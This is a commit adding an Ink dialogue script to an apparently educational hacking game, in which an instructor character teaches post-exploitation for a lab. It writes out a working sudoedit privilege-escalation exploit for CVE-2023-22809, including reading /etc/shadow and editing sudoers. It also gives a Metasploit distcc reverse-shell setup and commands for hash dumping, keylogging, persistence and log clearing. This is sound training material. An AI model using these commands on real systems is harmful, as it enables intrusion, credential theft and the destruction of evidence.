cybersecurity/BreakEscape
1
0
Fork 0
mirror of https://github.com/cliffe/BreakEscape.git synced 2026-02-21 11:18:08 +00:00
Code Issues Packages Projects Releases Wiki Activity

feat: Add GBL post-exploitation techniques lab sheet

Browse Source
This commit is contained in:
Z. Cliffe Schreuders
2025-11-19 18:24:26 +00:00
parent ab96da0731
commit 1a0539d432
1 changed files with 906 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

906
story_design/ink/lab_sheets/post_exploitation.ink Normal file
View File

@@ -0,0 +1,906 @@
// Post-exploitation Lab Sheet
// Based on HacktivityLabSheets: introducing_attacks/7_post-exploitation.md
// Author: Z. Cliffe Schreuders, Anatoliy Gorbenko, Thalita Vergilio
// License: CC BY-SA 4.0
// Global persistent state
VAR instructor_rapport = 0
VAR post_exploit_mastery = 0
// External variables
EXTERNAL player_name
=== start ===
Advanced Tactics Instructor: Welcome, Agent {player_name}. I'm your instructor for Post-Exploitation Techniques.
~ instructor_rapport = 0
~ post_exploit_mastery = 0
Advanced Tactics Instructor: Post-exploitation is what happens after you gain initial access. It's about leveraging that foothold to gather information, escalate privileges, and achieve your objectives.
Advanced Tactics Instructor: Once an attacker has compromised a system, they can misuse the privileges they've appropriated to take further actions - or go on to compromise other connected systems.
Advanced Tactics Instructor: This lab completes the attack lifecycle - from initial exploitation through privilege escalation, information gathering, and pivoting to other systems.
Advanced Tactics Instructor: Remember: these are powerful techniques for authorized penetration testing and defensive security only.
~ post_exploit_mastery += 10
-> post_exploit_hub
=== post_exploit_hub ===
Advanced Tactics Instructor: What aspect of post-exploitation would you like to explore?
+ [What is post-exploitation?]
-> post_exploit_intro
+ [Understanding shell access]
-> shell_access
+ [Assessing your level of access]
-> assessing_access
+ [Post-exploitation information gathering]
-> info_gathering
+ [Privilege escalation techniques]
-> privilege_escalation
+ [Using the sudo vulnerability (CVE-2023-22809)]
-> sudo_vulnerability
+ [Metasploit post-exploitation modules]
-> msf_post_modules
+ [Introduction to Meterpreter]
-> meterpreter_intro
+ [Meterpreter spyware features]
-> meterpreter_spyware
+ [Pivoting and port forwarding]
-> pivoting
+ [Maintaining access and covering tracks]
-> persistence_evasion
+ [Show me the commands reference]
-> commands_reference
+ [Practical challenge tips]
-> challenge_tips
+ [I'm ready for the lab exercises]
-> ready_for_practice
+ [That's all for now]
#exit_conversation
-> END
=== post_exploit_intro ===
Advanced Tactics Instructor: Post-exploitation is everything that happens after you successfully compromise a system.
~ instructor_rapport += 5
Advanced Tactics Instructor: The initial exploit gives you a foothold - usually limited access as whatever user account the vulnerable software was running as.
Advanced Tactics Instructor: From there, you need to:
understand what level of access you have, gather information about the system, escalate privileges if possible, collect sensitive data, maintain access, and potentially pivot to other systems.
+ [Why not just stop after getting shell access?]
Advanced Tactics Instructor: Initial access is often limited. You might be running as a low-privilege user, not an administrator.
Advanced Tactics Instructor: You need to understand the system, find sensitive data, escalate to higher privileges, and ensure you can maintain access.
Advanced Tactics Instructor: In a real penetration test, you're demonstrating impact - showing what an attacker could actually DO with that access.
Advanced Tactics Instructor: That means accessing sensitive files, dumping credentials, and potentially moving laterally to other systems.
~ instructor_rapport += 5
+ [What determines what you can do post-exploitation?]
Advanced Tactics Instructor: Several factors determine your capabilities:
Advanced Tactics Instructor: First, the type of payload you used. A simple shell gives you command execution. Meterpreter gives you advanced features.
Advanced Tactics Instructor: Second, the security context - what user account is the vulnerable software running as?
Advanced Tactics Instructor: Third, the access controls in place. Are there additional restrictions beyond standard user permissions?
Advanced Tactics Instructor: Finally, your skill at the command line and understanding of the operating system.
~ instructor_rapport += 5
- -> post_exploit_hub
=== shell_access ===
Advanced Tactics Instructor: Shell access means you have access to a command line interface on the target system.
~ instructor_rapport += 5
Advanced Tactics Instructor: On Windows, this is typically a Command Prompt or PowerShell. On Unix/Linux systems, it's usually a Bash shell.
Advanced Tactics Instructor: Sometimes you'll see a familiar prompt. Other times you won't see any prompt at all, but you can still type commands and see output.
+ [What can I do with shell access?]
Advanced Tactics Instructor: With shell access, you can run almost any command-line program available on the system.
Advanced Tactics Instructor: You can list files, read documents, run scripts, check system information, create new files, and much more.
Advanced Tactics Instructor: However, you're limited by the permissions of whatever user account you're running as.
Advanced Tactics Instructor: If you're a normal user, you can't access administrator-only files or install system-wide software.
~ instructor_rapport += 5
+ [What commands should I avoid?]
Advanced Tactics Instructor: Avoid interactive programs that expect keyboard input and draw to the screen.
Advanced Tactics Instructor: For example, on Linux use "cat" instead of "less", because less expects you to scroll and press 'q' to quit.
Advanced Tactics Instructor: Avoid programs that run continuously until stopped, like "ping" without a count limit.
Advanced Tactics Instructor: Also be careful with Ctrl-C - it will likely kill your shell connection rather than just the current command.
~ instructor_rapport += 5
+ [What's the difference between shells on Windows and Linux?]
Advanced Tactics Instructor: Windows shells typically use backslashes in paths (C:\\Users\\), while Linux uses forward slashes (/home/).
Advanced Tactics Instructor: Common Windows commands: dir, type, net user, whoami, ipconfig
Advanced Tactics Instructor: Common Linux commands: ls, cat, whoami, id, ifconfig (or ip a)
Advanced Tactics Instructor: The privilege model is different too - Windows has Administrator/System, Linux has root (UID 0).
~ instructor_rapport += 5
- -> post_exploit_hub
=== assessing_access ===
Advanced Tactics Instructor: The first question after exploitation is: what level of access do I have?
~ instructor_rapport += 5
Advanced Tactics Instructor: You need to determine what user account you're running as and what privileges that account has.
Advanced Tactics Instructor: On Windows, you might have Administrator, System, or a regular user account. On Linux, you want to know if you're root (UID 0) or a normal user.
+ [How do I check my access level on Linux?]
Advanced Tactics Instructor: Use these commands to assess your Linux access:
Advanced Tactics Instructor: whoami - Shows your username
Advanced Tactics Instructor: id - Shows your user ID (UID), group ID (GID), and groups
Advanced Tactics Instructor: id -u - Shows just the UID. A UID of 0 means you're root!
Advanced Tactics Instructor: Any other UID means you're a normal user with standard access controls applying.
~ instructor_rapport += 5
+ [How do I check my access level on Windows?]
Advanced Tactics Instructor: On Windows, you can use:
Advanced Tactics Instructor: whoami - Shows your username and domain
Advanced Tactics Instructor: whoami /priv - Shows your privileges
Advanced Tactics Instructor: net user USERNAME - Shows details about a user account
Advanced Tactics Instructor: If you have Meterpreter: getuid and getprivs give detailed privilege information.
~ instructor_rapport += 5
+ [What if I don't have root or Administrator access?]
Advanced Tactics Instructor: That's very common! Most services run as unprivileged users for security reasons.
Advanced Tactics Instructor: You can still access files that user can read, which might include sensitive data.
Advanced Tactics Instructor: You can gather system information to look for privilege escalation opportunities.
Advanced Tactics Instructor: On Linux, try accessing /etc/shadow - if you can't, that confirms you're not root.
Advanced Tactics Instructor: Then you'll want to look for privilege escalation vulnerabilities.
~ instructor_rapport += 5
- -> post_exploit_hub
=== info_gathering ===
Advanced Tactics Instructor: Information gathering continues even after exploitation. Understanding the system helps you plan your next moves.
~ instructor_rapport += 5
Advanced Tactics Instructor: You want to learn about the operating system, installed software, network configuration, running processes, and other users.
+ [What system information should I gather on Linux?]
Advanced Tactics Instructor: Key commands for Linux information gathering:
Advanced Tactics Instructor: uname -a (kernel version and architecture)
Advanced Tactics Instructor: cat /proc/cpuinfo (CPU details)
Advanced Tactics Instructor: free -h (memory usage)
Advanced Tactics Instructor: df -h (disk usage and partitions)
Advanced Tactics Instructor: env (environment variables)
Advanced Tactics Instructor: cat /etc/passwd (list of user accounts)
Advanced Tactics Instructor: This information helps you understand the target and identify potential attack vectors.
~ instructor_rapport += 5
+ [Why check the sudo version?]
Advanced Tactics Instructor: The sudo command allows users to run commands with elevated privileges.
Advanced Tactics Instructor: Check the version with: sudo --version
Advanced Tactics Instructor: Certain versions of sudo have critical security vulnerabilities that allow privilege escalation!
Advanced Tactics Instructor: For example, CVE-2023-22809 affects sudo versions 1.8.0 through 1.9.12p1.
Advanced Tactics Instructor: Finding a vulnerable sudo version is a goldmine for privilege escalation.
~ instructor_rapport += 5
+ [What network information is useful?]
Advanced Tactics Instructor: Network information reveals what other systems you might be able to reach:
Advanced Tactics Instructor: ifconfig or ip a (network interfaces and IP addresses)
Advanced Tactics Instructor: netstat -an or ss -an (active connections and listening ports)
Advanced Tactics Instructor: route or ip route (routing table)
Advanced Tactics Instructor: cat /etc/resolv.conf (DNS configuration)
Advanced Tactics Instructor: This helps you identify other systems to pivot to or internal networks to explore.
~ instructor_rapport += 5
- -> post_exploit_hub
=== privilege_escalation ===
Advanced Tactics Instructor: Privilege escalation means gaining additional privileges you weren't intentionally granted.
~ instructor_rapport += 5
Advanced Tactics Instructor: Vertical privilege escalation is going from normal user to administrator/root. Horizontal privilege escalation is accessing resources of another user at the same privilege level.
Advanced Tactics Instructor: Privilege escalation exploits vulnerabilities in the kernel, system software, or misconfigurations.
+ [What are common privilege escalation vectors?]
Advanced Tactics Instructor: Common privilege escalation opportunities include:
Advanced Tactics Instructor: Vulnerable kernel versions with known local exploits
Advanced Tactics Instructor: Vulnerable system software like sudo, polkit, or services
Advanced Tactics Instructor: Misconfigured SUID binaries on Linux
Advanced Tactics Instructor: Weak file permissions on sensitive files
Advanced Tactics Instructor: Scheduled tasks running as administrators
Advanced Tactics Instructor: Credentials stored in plaintext or easily crackable formats
~ instructor_rapport += 5
+ [How do I find privilege escalation opportunities?]
Advanced Tactics Instructor: Systematic enumeration is key:
Advanced Tactics Instructor: Check kernel and software versions against CVE databases
Advanced Tactics Instructor: Look for SUID binaries: find / -perm -4000 2>/dev/null
Advanced Tactics Instructor: Check sudo permissions: sudo -l
Advanced Tactics Instructor: Look for world-writable files in sensitive directories
Advanced Tactics Instructor: Check for credentials in config files, bash history, and environment variables
~ instructor_rapport += 5
+ [Tell me about the sudo vulnerability]
-> sudo_vulnerability
- -> post_exploit_hub
=== sudo_vulnerability ===
Advanced Tactics Instructor: CVE-2023-22809 is a critical sudo vulnerability affecting versions 1.8.0 through 1.9.12p1.
~ instructor_rapport += 5
Advanced Tactics Instructor: The vulnerability is in sudoedit, which allows editing files with elevated privileges.
Advanced Tactics Instructor: By manipulating environment variables, you can trick sudoedit into opening files you shouldn't have access to.
+ [How does this vulnerability work?]
Advanced Tactics Instructor: The vulnerability exploits how sudoedit processes the EDITOR environment variable.
Advanced Tactics Instructor: Normally, sudoedit restricts which files you can edit. But a coding mistake means you can use "--" to specify additional files.
Advanced Tactics Instructor: For example: EDITOR='cat -- /etc/shadow' sudoedit /etc/hosts
Advanced Tactics Instructor: This tells sudoedit to use "cat" as the editor and tricks it into opening /etc/shadow with root privileges!
Advanced Tactics Instructor: The /etc/hosts file is just a decoy to satisfy sudoedit's normal operation.
~ instructor_rapport += 5
+ [How can I use this to escalate privileges?]
Advanced Tactics Instructor: First, you can read sensitive files: EDITOR='cat -- /etc/shadow' sudoedit /etc/hosts
Advanced Tactics Instructor: This gives you password hashes which you might crack offline.
Advanced Tactics Instructor: More powerfully, you can edit the sudoers file: EDITOR='vim -- /etc/sudoers' sudoedit /etc/hosts
Advanced Tactics Instructor: Add a line like: distccd ALL=(ALL) NOPASSWD:ALL
Advanced Tactics Instructor: This allows your user to run any command as root without a password: sudo -i
Advanced Tactics Instructor: Now you're root!
~ instructor_rapport += 5
+ [What's tricky about exploiting this?]
Advanced Tactics Instructor: The challenge is that your simple shell doesn't support full interactive programs well.
Advanced Tactics Instructor: When you use vim to edit /etc/sudoers, the display will be distorted and arrow keys won't work properly.
Advanced Tactics Instructor: You need to carefully use vim commands without visual feedback:
"G" then "o" to go to bottom and insert new line, type your new line, "Esc" then ":x" to save.
Advanced Tactics Instructor: Be very careful - if you corrupt /etc/sudoers, you'll break the VM!
~ instructor_rapport += 5
- -> post_exploit_hub
=== msf_post_modules ===
Advanced Tactics Instructor: Metasploit has numerous post-exploitation modules for automated information gathering and attacks.
~ instructor_rapport += 5
Advanced Tactics Instructor: These modules run against established sessions to collect data, escalate privileges, or set up persistence.
Advanced Tactics Instructor: They're categorized by operating system and function: gather, escalate, manage, recon, and more.
+ [How do I use post-exploitation modules?]
Advanced Tactics Instructor: First, you need an active session. Background it with Ctrl-Z.
Advanced Tactics Instructor: Check your session ID: sessions
Advanced Tactics Instructor: Select a post module: use post/linux/gather/checkvm
Advanced Tactics Instructor: Set the session: setg SESSION 1 (or your session ID)
Advanced Tactics Instructor: Using "setg" sets it globally, so you don't have to set it for each module.
Advanced Tactics Instructor: Run the module: exploit (or run)
~ instructor_rapport += 5
+ [What useful post-exploitation modules exist?]
Advanced Tactics Instructor: For Linux targets, valuable modules include:
Advanced Tactics Instructor: post/linux/gather/checkvm - Detect if running in a VM
Advanced Tactics Instructor: post/linux/gather/enum_configs - Download config files
Advanced Tactics Instructor: post/linux/gather/enum_network - Network configuration
Advanced Tactics Instructor: post/linux/gather/enum_system - System and software information
Advanced Tactics Instructor: post/linux/gather/enum_users_history - Command history and logs
Advanced Tactics Instructor: post/linux/gather/hashdump - Dump password hashes
~ instructor_rapport += 5
+ [Where does collected information get stored?]
Advanced Tactics Instructor: Post-exploitation modules store collected data as "loot" in Metasploit's database.
Advanced Tactics Instructor: The module output tells you where files are saved, usually in ~/.msf4/loot/
Advanced Tactics Instructor: You can view loot with: loot
Advanced Tactics Instructor: Files are timestamped and categorized, making it easy to review later for report writing.
~ instructor_rapport += 5
- -> post_exploit_hub
=== meterpreter_intro ===
Advanced Tactics Instructor: Meterpreter is an advanced payload originally developed by Matt Miller (Skape).
~ instructor_rapport += 5
Advanced Tactics Instructor: Unlike a simple shell, Meterpreter provides a sophisticated remote administration framework with many built-in features.
Advanced Tactics Instructor: It's dynamically extensible - features can be loaded as needed. By default, it encrypts all communications.
+ [What makes Meterpreter special?]
Advanced Tactics Instructor: Meterpreter has numerous advantages over basic shells:
Advanced Tactics Instructor: Runs entirely in memory - doesn't write to disk, making forensics harder
Advanced Tactics Instructor: Encrypted communications by default
Advanced Tactics Instructor: Rich command set for file browsing, process manipulation, network operations
Advanced Tactics Instructor: Can migrate between processes to hide or achieve persistence
Advanced Tactics Instructor: Extensible with post-exploitation modules
Advanced Tactics Instructor: Includes "spyware" features like keylogging and screen capture
~ instructor_rapport += 5
+ [How do I use Meterpreter commands?]
Advanced Tactics Instructor: Start by viewing available commands: help
Advanced Tactics Instructor: Get current privileges: getuid and getprivs
Advanced Tactics Instructor: Browse files: ls c:/ (Windows) or ls / (Linux)
Advanced Tactics Instructor: Download files: download /path/to/file
Advanced Tactics Instructor: Upload files: upload /local/file /remote/file
Advanced Tactics Instructor: View processes: ps
Advanced Tactics Instructor: Migrate to another process: migrate PID
Advanced Tactics Instructor: Drop to a system shell: shell (Ctrl-D to return to Meterpreter)
~ instructor_rapport += 5
+ [How does Meterpreter avoid detection?]
Advanced Tactics Instructor: Meterpreter is designed for stealth:
Advanced Tactics Instructor: It stays in memory and doesn't write files to disk (fileless malware)
Advanced Tactics Instructor: By default it masquerades as "svchost.exe" on Windows, a common legitimate process
Advanced Tactics Instructor: It can migrate into other running processes, making it hard to identify
Advanced Tactics Instructor: Communications are encrypted, making network monitoring less effective
Advanced Tactics Instructor: However, modern endpoint detection systems can still identify Meterpreter through behavioral analysis.
~ instructor_rapport += 5
- -> post_exploit_hub
=== meterpreter_spyware ===
Advanced Tactics Instructor: Meterpreter includes features typically associated with spyware - monitoring user activity without their knowledge.
~ instructor_rapport += 5
Advanced Tactics Instructor: These features can capture keystrokes, screenshots, and even webcam feeds.
Advanced Tactics Instructor: While concerning for privacy, they're useful for security testing to demonstrate the risk of compromise.
+ [How does keylogging work in Meterpreter?]
Advanced Tactics Instructor: Meterpreter can capture all keystrokes on the target system.
Advanced Tactics Instructor: In Armitage: Right-click target → Meterpreter → Explore → Log Keystrokes
Advanced Tactics Instructor: Set CAPTURE_TYPE to "winlogon" to capture login attempts
Advanced Tactics Instructor: Via command line: keyscan_start (then keyscan_dump to view results)
Advanced Tactics Instructor: This captures everything typed - passwords, emails, documents, searches.
~ instructor_rapport += 5
+ [How do I capture screenshots?]
Advanced Tactics Instructor: Screenshots show what the user is viewing:
Advanced Tactics Instructor: screenshot - Captures current screen
Advanced Tactics Instructor: The image is downloaded to your Kali system and automatically opened
Advanced Tactics Instructor: This can reveal sensitive documents, credentials, or user behavior
Advanced Tactics Instructor: In Armitage, there are menu options for screen capture in the Meterpreter menu.
~ instructor_rapport += 5
+ [Can I get full graphical control?]
Advanced Tactics Instructor: Yes! You can use VNC for full graphical remote control:
Advanced Tactics Instructor: In Armitage: Right-click target → Meterpreter → Interact → Desktop (VNC)
Advanced Tactics Instructor: Armitage starts a VNC server on the target and tells you the port
Advanced Tactics Instructor: Connect with: vncviewer 127.0.0.1:PORT
Advanced Tactics Instructor: You'll see and control the target's desktop just like sitting at their keyboard!
Advanced Tactics Instructor: This is powerful but obvious to any user who's watching their screen.
~ instructor_rapport += 5
- -> post_exploit_hub
=== pivoting ===
Advanced Tactics Instructor: Pivoting means using a compromised system as a stepping stone to attack other systems.
~ instructor_rapport += 5
Advanced Tactics Instructor: Often attackers can't directly reach internal systems - firewalls, NAT, and network segmentation block direct access.
Advanced Tactics Instructor: But if you compromise a system that CAN reach those internal systems, you can route your attacks through it.
+ [Why would I need to pivot?]
Advanced Tactics Instructor: Several scenarios require pivoting:
Advanced Tactics Instructor: Attacking internal systems from a compromised public-facing server
Advanced Tactics Instructor: Accessing networks behind firewalls or NAT
Advanced Tactics Instructor: Moving laterally through a corporate network
Advanced Tactics Instructor: Hiding your true origin by routing through multiple compromised hosts
Advanced Tactics Instructor: In real penetration tests, you often start from a DMZ server and need to pivot to reach critical internal systems.
~ instructor_rapport += 5
+ [How does Meterpreter pivoting work?]
Advanced Tactics Instructor: Meterpreter can set up routing so all your attacks go through a compromised host.
Advanced Tactics Instructor: In Armitage: Right-click compromised host → Meterpreter → Pivoting → Setup → Add Pivot
Advanced Tactics Instructor: Via command line, you use the "route" command in msfconsole
Advanced Tactics Instructor: Once configured, any Metasploit attacks you launch will be routed through that system
Advanced Tactics Instructor: The pivoted attacks will appear to come from the compromised system, not your Kali VM.
~ instructor_rapport += 5
+ [What's port forwarding?]
Advanced Tactics Instructor: Port forwarding is a simpler form of pivoting.
Advanced Tactics Instructor: You instruct a compromised system to listen on a port and forward connections to a different host and port.
Advanced Tactics Instructor: For example, forward local port 8080 to an internal web server on 10.0.0.5:80
Advanced Tactics Instructor: This makes the internal service accessible through the compromised system.
Advanced Tactics Instructor: Meterpreter's portfwd command handles this: portfwd add -l 8080 -p 80 -r 10.0.0.5
~ instructor_rapport += 5
- -> post_exploit_hub
=== persistence_evasion ===
Advanced Tactics Instructor: Maintaining access and covering tracks are advanced post-exploitation techniques.
~ instructor_rapport += 5
Advanced Tactics Instructor: Persistence means ensuring you can regain access even if the system reboots or the service is restarted.
Advanced Tactics Instructor: Covering tracks means removing evidence of the attack from logs and the filesystem.
+ [How do attackers maintain access?]
Advanced Tactics Instructor: Common persistence mechanisms include:
Advanced Tactics Instructor: Creating new user accounts with administrative privileges
Advanced Tactics Instructor: Installing backdoors that run on boot (services, scheduled tasks, startup scripts)
Advanced Tactics Instructor: Modifying SSH authorized_keys to allow your key
Advanced Tactics Instructor: Installing rootkits that hide processes and files
Advanced Tactics Instructor: Meterpreter has post-exploitation modules specifically for persistence.
~ instructor_rapport += 5
+ [How do you cover your tracks?]
Advanced Tactics Instructor: Covering tracks involves removing or modifying evidence:
Advanced Tactics Instructor: Clearing log files (on Linux: /var/log/auth.log, /var/log/syslog, etc.)
Advanced Tactics Instructor: Clearing command history (bash history, PowerShell history)
Advanced Tactics Instructor: Removing uploaded tools and malware
Advanced Tactics Instructor: Modifying file timestamps to match surrounding files
Advanced Tactics Instructor: However, sophisticated forensics can often detect these modifications.
~ instructor_rapport += 5
+ [Does Meterpreter have anti-forensics features?]
Advanced Tactics Instructor: Yes, Meterpreter is designed with anti-forensics in mind:
Advanced Tactics Instructor: It runs in memory without writing to disk (fileless)
Advanced Tactics Instructor: It can migrate between processes, making it hard to find
Advanced Tactics Instructor: Communications are encrypted
Advanced Tactics Instructor: There are modules to clear event logs: clearev
Advanced Tactics Instructor: However, modern endpoint detection and response (EDR) tools can detect Meterpreter through behavioral analysis.
~ instructor_rapport += 5
- -> post_exploit_hub
=== commands_reference ===
Advanced Tactics Instructor: Let me provide a comprehensive post-exploitation commands reference.
~ instructor_rapport += 5
Advanced Tactics Instructor: **Initial Exploitation (Distcc example):**
Advanced Tactics Instructor: nmap -p 1-65535 TARGET (scan all ports)
Advanced Tactics Instructor: msfconsole
Advanced Tactics Instructor: search distccd
Advanced Tactics Instructor: use exploit/unix/misc/distcc_exec
Advanced Tactics Instructor: set RHOST TARGET_IP
Advanced Tactics Instructor: set PAYLOAD cmd/unix/reverse
Advanced Tactics Instructor: set LHOST YOUR_IP
Advanced Tactics Instructor: exploit
+ [Show me access assessment commands]
Advanced Tactics Instructor: **Assessing Access Level:**
Advanced Tactics Instructor: whoami (show username)
Advanced Tactics Instructor: id (show UID, GID, groups)
Advanced Tactics Instructor: id -u (show just UID - 0 means root)
Advanced Tactics Instructor: cat /etc/shadow (try to read - if fails, not root)
~ instructor_rapport += 3
+ [Show me information gathering commands]
Advanced Tactics Instructor: **Information Gathering (Linux):**
Advanced Tactics Instructor: env (environment variables)
Advanced Tactics Instructor: uname -a (kernel version)
Advanced Tactics Instructor: cat /proc/cpuinfo (CPU info)
Advanced Tactics Instructor: free -h (memory)
Advanced Tactics Instructor: df -h (disk space)
Advanced Tactics Instructor: cat /etc/passwd (user accounts)
Advanced Tactics Instructor: sudo --version (check for vulnerable sudo)
Advanced Tactics Instructor: ifconfig or ip a (network interfaces)
~ instructor_rapport += 3
+ [Show me privilege escalation commands]
Advanced Tactics Instructor: **Privilege Escalation (CVE-2023-22809):**
Advanced Tactics Instructor: EDITOR='cat -- /etc/shadow' sudoedit /etc/hosts
Advanced Tactics Instructor: (View password hashes)
Advanced Tactics Instructor: EDITOR='vim -- /etc/sudoers' sudoedit /etc/hosts
Advanced Tactics Instructor: (Edit sudoers file - be very careful!)
Advanced Tactics Instructor: In vim: Press Enter, type "Go", press Enter, type "distccd ALL=(ALL) NOPASSWD:ALL"
Advanced Tactics Instructor: Press Esc, type ":x", press Enter, press Esc, type ":q!", press Enter
Advanced Tactics Instructor: sudo -i (escalate to root)
~ instructor_rapport += 3
+ [Show me Linux admin commands]
Advanced Tactics Instructor: **Linux Post-Exploitation:**
Advanced Tactics Instructor: useradd USERNAME (create user)
Advanced Tactics Instructor: passwd USERNAME (set password)
Advanced Tactics Instructor: cat /etc/passwd (list users)
Advanced Tactics Instructor: sh (spawn command interpreter)
~ instructor_rapport += 3
+ [Show me Metasploit post modules]
Advanced Tactics Instructor: **Metasploit Post-Exploitation:**
Advanced Tactics Instructor: Ctrl-Z (background session)
Advanced Tactics Instructor: sessions (list sessions)
Advanced Tactics Instructor: use post/linux/gather/checkvm
Advanced Tactics Instructor: setg SESSION 1
Advanced Tactics Instructor: exploit
Advanced Tactics Instructor: **Useful Post Modules:**
Advanced Tactics Instructor: post/linux/gather/enum_configs
Advanced Tactics Instructor: post/linux/gather/enum_network
Advanced Tactics Instructor: post/linux/gather/enum_system
Advanced Tactics Instructor: post/linux/gather/enum_users_history
Advanced Tactics Instructor: post/linux/gather/hashdump
~ instructor_rapport += 3
+ [Show me Meterpreter commands]
Advanced Tactics Instructor: **Meterpreter Commands:**
Advanced Tactics Instructor: help (list all commands)
Advanced Tactics Instructor: getuid (current user)
Advanced Tactics Instructor: getprivs (privileges)
Advanced Tactics Instructor: ls c:/ (browse files)
Advanced Tactics Instructor: download FILE (download file)
Advanced Tactics Instructor: upload LOCAL REMOTE (upload file)
Advanced Tactics Instructor: ps (list processes)
Advanced Tactics Instructor: migrate PID (migrate to process)
Advanced Tactics Instructor: shell (drop to system shell, Ctrl-D to return)
Advanced Tactics Instructor: run post/windows/gather/hashdump (dump hashes)
Advanced Tactics Instructor: screenshot (capture screen)
Advanced Tactics Instructor: keyscan_start / keyscan_dump (keylogging)
~ instructor_rapport += 3
+ [Show me Armitage commands]
Advanced Tactics Instructor: **Armitage Setup:**
Advanced Tactics Instructor: sudo msfdb reinit
Advanced Tactics Instructor: sudo armitage &
Advanced Tactics Instructor: **Armitage Workflow:**
Advanced Tactics Instructor: Hosts → Add Host → enter IP
Advanced Tactics Instructor: Right-click host → Scan
Advanced Tactics Instructor: Drag exploit onto target icon → Launch
Advanced Tactics Instructor: Right-click compromised host → Meterpreter → Interact
Advanced Tactics Instructor: **Pivoting:**
Advanced Tactics Instructor: Right-click → Meterpreter → Pivoting → Setup → Add Pivot
~ instructor_rapport += 3
- -> post_exploit_hub
=== challenge_tips ===
Advanced Tactics Instructor: Let me give you practical tips for the post-exploitation challenges.
~ instructor_rapport += 5
Advanced Tactics Instructor: **Exploiting Distcc:**
Advanced Tactics Instructor: Scan all ports to find distcc: nmap -p- TARGET
Advanced Tactics Instructor: Use exploit/unix/misc/distcc_exec with cmd/unix/reverse payload
Advanced Tactics Instructor: You'll get a shell as the distccd user, not root.
+ [Tips for privilege escalation?]
Advanced Tactics Instructor: Check the sudo version immediately: sudo --version
Advanced Tactics Instructor: If it's vulnerable (1.8.0-1.9.12p1), use the CVE-2023-22809 exploit.
Advanced Tactics Instructor: When editing /etc/sudoers with vim, follow the commands EXACTLY - one wrong keystroke can break the VM.
Advanced Tactics Instructor: After editing sudoers, run: sudo -i to become root.
Advanced Tactics Instructor: Verify with: id -u (should show 0)
~ instructor_rapport += 5
+ [Tips for using post-exploitation modules?]
Advanced Tactics Instructor: Always background your session first with Ctrl-Z
Advanced Tactics Instructor: Use "setg SESSION ID" to set the session globally for all modules.
Advanced Tactics Instructor: Run multiple enum modules to gather comprehensive information.
Advanced Tactics Instructor: The output tells you where loot is stored - check those files!
Advanced Tactics Instructor: Not all modules work perfectly - if one fails, move on to others.
~ instructor_rapport += 5
+ [Tips for using Meterpreter and Armitage?]
Advanced Tactics Instructor: Exploit the Windows server with easyftp to get a Meterpreter session.
Advanced Tactics Instructor: Use getuid and getprivs to understand your privileges immediately.
Advanced Tactics Instructor: Browse to user desktops to find flags: ls C:\\Users\\
Advanced Tactics Instructor: Try both Meterpreter commands and Armitage's GUI features.
Advanced Tactics Instructor: If Meterpreter becomes unresponsive, restart the Windows VM and re-exploit.
~ instructor_rapport += 5
+ [Tips for pivoting?]
Advanced Tactics Instructor: Set up a pivot through the Windows system to attack Linux.
Advanced Tactics Instructor: In Armitage: Right-click Windows → Meterpreter → Pivoting → Setup → Add Pivot
Advanced Tactics Instructor: Add the Linux target: Hosts → Add Hosts → enter Linux IP
Advanced Tactics Instructor: Scan and exploit through the pivot - it will be slower but will work.
Advanced Tactics Instructor: The Armitage interface shows the routing path visually.
~ instructor_rapport += 5
+ [Where are the flags?]
Advanced Tactics Instructor: Linux flags are in user home directories under /home/
Advanced Tactics Instructor: Use find /home -name "*flag*" to search for them.
Advanced Tactics Instructor: Windows flags are on user Desktops: C:\\Users\\USERNAME\\Desktop\\
Advanced Tactics Instructor: One Linux challenge involves cracking a protected.zip file.
Advanced Tactics Instructor: You'll need to dump password hashes and crack them to get the zip password.
~ instructor_rapport += 5
- -> post_exploit_hub
=== ready_for_practice ===
Advanced Tactics Instructor: Excellent! You're ready for advanced post-exploitation techniques.
~ instructor_rapport += 10
~ post_exploit_mastery += 10
Advanced Tactics Instructor: This lab completes your understanding of the full attack lifecycle - from initial reconnaissance through exploitation to post-exploitation.
Advanced Tactics Instructor: You'll exploit systems, escalate privileges, gather sensitive data, and pivot through networks.
Advanced Tactics Instructor: Remember: these techniques are powerful and potentially destructive. Use them only for authorized penetration testing and defensive security.
+ [Any final advice?]
Advanced Tactics Instructor: Work methodically. After each exploitation, assess your access, gather information, then escalate privileges.
Advanced Tactics Instructor: Take careful notes of what you find - credentials, software versions, vulnerable services.
Advanced Tactics Instructor: When using the sudo privilege escalation, follow the vim commands EXACTLY. Practice on a non-critical system first if you're nervous.
Advanced Tactics Instructor: Explore both Meterpreter commands and Armitage's interface to see which you prefer.
Advanced Tactics Instructor: Don't get frustrated if something doesn't work - exploit reliability varies. Try restarting VMs and trying again.
Advanced Tactics Instructor: Most importantly: understand WHY each technique works, not just HOW to execute it.
Advanced Tactics Instructor: Good luck, Agent {player_name}. This is where you demonstrate the full impact of system compromise.
~ instructor_rapport += 10
- -> post_exploit_hub
-> END